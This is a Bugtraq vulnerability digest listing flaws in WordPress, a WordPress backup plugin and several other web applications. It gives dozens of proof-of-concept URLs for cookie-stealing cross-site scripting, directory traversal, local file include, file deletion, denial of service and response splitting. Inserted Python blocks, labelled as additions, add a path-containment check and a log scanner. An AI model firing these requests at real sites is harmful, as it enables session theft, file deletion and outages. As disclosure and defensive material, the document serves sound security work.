securityvulns.com Russian vulnerabilities digest: WordPress vulnerabilities

Dear bugtraq,

  Below is a digest of vulnerabilities published by
  http://securityvulns.com/ and believed to be previously unpublished in
  English. All vulnerabilities were reported by MustLive
  (http://websecurity.com.ua/).

  1. AwesomeTemplateEngine cross-site scripting

  Multiple cross-site scripting vulnerabilities (require register_globals):

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Original article (in Russian): http://securityvulns.ru/Sdocument784.html
  Additional details (in Ukrainian): http://websecurity.com.ua/1694/

  2. WordPress multiple security vulnerabilities:

   2.1 information disclosure (WordPress 2.2/2.3)

    An invalid request discloses the database structure and local paths:

       http://site/?feed=rss2&p=1
  
    Original article (in Russian): http://securityvulns.ru/Sdocument663.html
    Additional details (in Ukrainian): http://websecurity.com.ua/1634/
   
   2.2 cross-site scripting (WordPress <= 2.0.9)

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

    Original article (in Russian): http://securityvulns.ru/Sdocument714.html
    Additional details (in Ukrainian): http://websecurity.com.ua/1658/

   2.3 Directory traversal, Arbitrary file deletion, Denial of Service
   and Cross-Site Scripting via wp-db-backup.php

   Directory Traversal (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess

   Arbitrary file deletion and DoS (WordPress <= 2.0.3):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../index.php

   XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Original article (in Russian): http://securityvulns.ru/Sdocument755.html
  Additional details (in Ukrainian): http://websecurity.com.ua/1676/

  2.4 Local file include, Directory traversal and Full path disclosure
  (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x)

  Full path disclosure:

http://site/wp-admin/admin.php?import=/../../wp-config
http://site/wp-admin/themes.php?page=
http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/templates.php?file=
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

  Local file include and Directory traversal:

http://site/wp-admin/admin.php?import=/../../file
http://site/wp-admin/themes.php?page=/../../file.php
http://site/wp-admin/themes.php?page=/../../.htaccess
http://site/wp-admin/edit.php?page=/../../file.php
http://site/wp-admin/edit.php?page=/../../.htaccess
http://site/wp-admin/admin.php?page=/../../file.php
http://site/wp-admin/admin.php?page=/../../.htaccess
http://site/wp-admin/templates.php?page=/../../file.php
http://site/wp-admin/templates.php?page=/../../.htaccess
http://site/wp-admin/edit-pages.php?page=/../../.htaccess
http://site/wp-admin/categories.php?page=/../../.htaccess
http://site/wp-admin/edit-comments.php?page=/../../.htaccess
http://site/wp-admin/moderation.php?page=/../../.htaccess
http://site/wp-admin/post.php?page=/../../.htaccess
http://site/wp-admin/page-new.php?page=/../../.htaccess
http://site/wp-admin/index.php?page=/../../file.php
http://site/wp-admin/index.php?page=/../../.htaccess
http://site/wp-admin/link-manager.php?page=/../../.htaccess
http://site/wp-admin/link-add.php?page=/../../.htaccess
http://site/wp-admin/link-categories.php?page=/../../.htaccess
http://site/wp-admin/link-import.php?page=/../../.htaccess
http://site/wp-admin/theme-editor.php?page=/../../.htaccess
http://site/wp-admin/plugin-editor.php?page=/../../.htaccess
http://site/wp-admin/profile.php?page=/../../.htaccess
http://site/wp-admin/users.php?page=/../../.htaccess
http://site/wp-admin/options-general.php?page=/../../.htaccess
http://site/wp-admin/options-writing.php?page=/../../.htaccess
http://site/wp-admin/options-reading.php?page=/../../.htaccess
http://site/wp-admin/options-discussion.php?page=/../../.htaccess
http://site/wp-admin/options-permalink.php?page=/../../.htaccess
http://site/wp-admin/options-misc.php?page=/../../.htaccess
http://site/wp-admin/import.php?page=/../../.htaccess
http://site/wp-admin/admin.php?page=/../../.htaccess
http://site/wp-admin/bookmarklet.php?page=/../../.htaccess
http://site/wp-admin/cat-js.php?page=/../../.htaccess
http://site/wp-admin/inline-uploading.php?page=/../../.htaccess
http://site/wp-admin/options.php?page=/../../.htaccess
http://site/wp-admin/profile-update.php?page=/../../.htaccess
http://site/wp-admin/sidebar.php?page=/../../.htaccess
http://site/wp-admin/user-edit.php?page=/../../.htaccess

  Arbitrary file edit:

http://site/wp-admin/templates.php?file=/../../file

  Attacks using backslashes instead of slashes are possible in the Windows version.

  Original article (in Russian):
           http://securityvulns.ru/Sdocument762.html
           http://securityvulns.ru/Sdocument768.html
           http://securityvulns.ru/Sdocument773.html
           http://securityvulns.ru/Sdocument772.html
  Additional details (in Ukrainian):
           http://websecurity.com.ua/1679/
           http://websecurity.com.ua/1683/
           http://websecurity.com.ua/1686/
           http://websecurity.com.ua/1687/
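
The include and traversal requests in 2.4 all share one shape: a file name taken from the `page=`, `import=` or `file=` parameter and handed to an include without checking that it stays inside wp-admin. As an added example (not code from the digest, from MustLive or from WordPress), here is the containment check such a handler needs, plus the stricter allow-list form; the admin directory path and the allow-list contents are assumptions made for the demo. It folds backslashes to slashes because the digest notes the backslash variants work on Windows, decodes twice to catch double-encoded dots, and treats an empty value (the full path disclosure case above) as a rejection.

```python
# Added example, not from the securityvulns.com digest or from WordPress:
# a containment check for an include-by-name parameter such as "page=".
# ADMIN_DIR and ALLOWED_PAGES are assumptions made for this demo.
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed: the only directory from which "page" includes may be served.
ADMIN_DIR = "/var/www/html/wp-admin"

# Assumed allow-list of page names a hardened handler would accept.
ALLOWED_PAGES = {"wp-db-backup.php", "options-contactform.php"}


def normalize_request_value(raw: str) -> str:
    """Decode the query value twice (to catch double encoding) and fold
    backslashes to slashes, since the digest notes that backslash variants
    work on Windows builds."""
    decoded = unquote(unquote(raw))
    return decoded.replace("\\", "/")


def resolve_include(raw: str, base_dir: str = ADMIN_DIR) -> Optional[str]:
    """Return the path to include, or None when the value is empty (the
    full path disclosure case: the directory itself would be included) or
    when lexical normalization shows it leaving base_dir. Pure string work
    via posixpath, so it runs without touching the filesystem."""
    candidate = normalize_request_value(raw).lstrip("/")
    if not candidate:
        return None
    base = posixpath.normpath(base_dir)
    joined = posixpath.normpath(posixpath.join(base, candidate))
    if joined == base or not joined.startswith(base + "/"):
        return None  # escaped (or named) the admin directory itself
    return joined


def allowlisted_include(raw: str) -> Optional[str]:
    """Stricter form: serve only exact names from ALLOWED_PAGES, which also
    closes the "include any .php under wp-admin" case that containment
    alone still permits."""
    name = normalize_request_value(raw)
    if name not in ALLOWED_PAGES:
        return None
    return posixpath.join(ADMIN_DIR, name)


if __name__ == "__main__":
    # Constructed request values: a legitimate page, the digest's traversal
    # form, its backslash (Windows) form and the empty (path disclosure) form.
    for value in ("wp-db-backup.php", "/../../.htaccess", "..%5C..%5C.htaccess", ""):
        print(repr(value), "->", resolve_include(value), "|", allowlisted_include(value))
```

Containment alone still lets a request include any file under the admin directory, which is why the allow-list variant is the one to prefer when the set of legitimate pages is known, as it is for a plugin menu.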


3. Cross-site scripting and Denial of Service in PRO-Search <= 0.17

XSS:

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Denial of Service:

http://site/?show_page=20000&time=0

Original article (in Russian): http://securityvulns.ru/Sdocument731.html
Additional details (in Ukrainian): http://websecurity.com.ua/1259/

4. Persistent cross-site scripting and request forgery in WP-ContactForm
<= 1.5 alpha (WordPress plugin)

POST request to

http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php

with different form fields.

Exploits:

          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html

Original article (in Russian):
          http://securityvulns.ru/Sdocument667.html
          http://securityvulns.ru/Sdocument546.html
Additional details (in Ukrainian):
          http://websecurity.com.ua/1641/
          http://websecurity.com.ua/1600/

5. RotaBanner Local <= 3 cross-site scripting

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Original article (in Russian): http://securityvulns.ru/Sdocument625.html
Additional details (in Ukrainian): http://websecurity.com.ua/1442/


6. ExpressionEngine <= 1.2.1 response splitting and cross-site scripting

http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument472.html
Additional details (in Ukrainian): http://websecurity.com.ua/1454/
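
The request shapes in items 1 to 6 are easy to pick out of web-server logs after the fact. The following is an added example, not code from the digest or from any project it names: a small scanner over Apache combined-format lines that flags traversal in `page=`/`backup=`/`import=`/`file=` style parameters (item 2.3 and 2.4), `<script` or `style=expression(` payloads in any query value (items 1, 2.2, 3, 5) and CR/LF inside a value, which is the `URL=` response-splitting case of item 6. The log-format regex and the sample lines are assumptions constructed for the demo, not captured traffic.

```python
# Added example, not part of the securityvulns.com digest: scan access-log
# lines for the request shapes the digest lists. The log lines below are
# constructed for the demo, not captured traffic.
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined-format prefix (assumed): client ident user [ts] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# ".." as a whole path component, with either separator (Windows variants).
TRAVERSAL_RE = re.compile(r"(^|[/\\])\.\.([/\\]|$)")
# Script tag or the style="...expression(" form used against popuptitle.
SCRIPT_RE = re.compile(r"<\s*script\b|style\s*=.*expression\s*\(", re.IGNORECASE)
# Raw CR/LF after decoding: header injection / response splitting.
CRLF_RE = re.compile(r"[\r\n]")


def classify(target: str) -> List[str]:
    """Return findings such as 'traversal:backup' for one request target."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl decodes one layer of %XX; decode again for double encoding.
    for key, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)
        if TRAVERSAL_RE.search(decoded):
            findings.append(f"traversal:{key}")
        if SCRIPT_RE.search(decoded):
            findings.append(f"xss:{key}")
        if CRLF_RE.search(decoded):
            findings.append(f"crlf:{key}")
    return findings


def scan(lines) -> List[Tuple[str, str, List[str]]]:
    """Parse each log line and keep (client, target, findings) for hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


# Constructed sample lines; the first three mirror digest items 2.3, 2.2 and 6,
# the last two are benign requests (including the 2.1 feed request).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2007:12:00:01 +0000] "GET /wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2007:12:00:02 +0000] "GET /wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(1))%22 HTTP/1.1" 200 1044 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Nov/2007:12:00:03 +0000] "GET /index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Nov/2007:12:00:04 +0000] "GET /?feed=rss2&p=1 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Nov/2007:12:00:05 +0000] "GET /wp-admin/edit.php?page=wp-db-backup.php HTTP/1.1" 200 3300 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, findings, target)
```

The `?feed=rss2&p=1` request of item 2.1 is deliberately not flagged: nothing in that query is malformed, so that class needs a response-side check (status code or error text in the body) rather than a request-pattern match.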

-=-=-=-

There are also a few vulnerabilities published in English as part of
the Month of Bugs in CAPTCHA:

Cryptographp <= 1.2 WordPress plugin multiple persistent cross-site
scripting vulnerabilities

Original article: http://websecurity.com.ua/1596/

XSS in Math Comment Spam Protection < 2.2

Original article: http://websecurity.com.ua/1576/

XSS in Captcha! <= 2.5d

Original article: http://websecurity.com.ua/1588/



--
http://securityvulns.com/
         //_//
        { , . }     |/
+--oQQo->{ ^ }<-----+ /
> ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/
 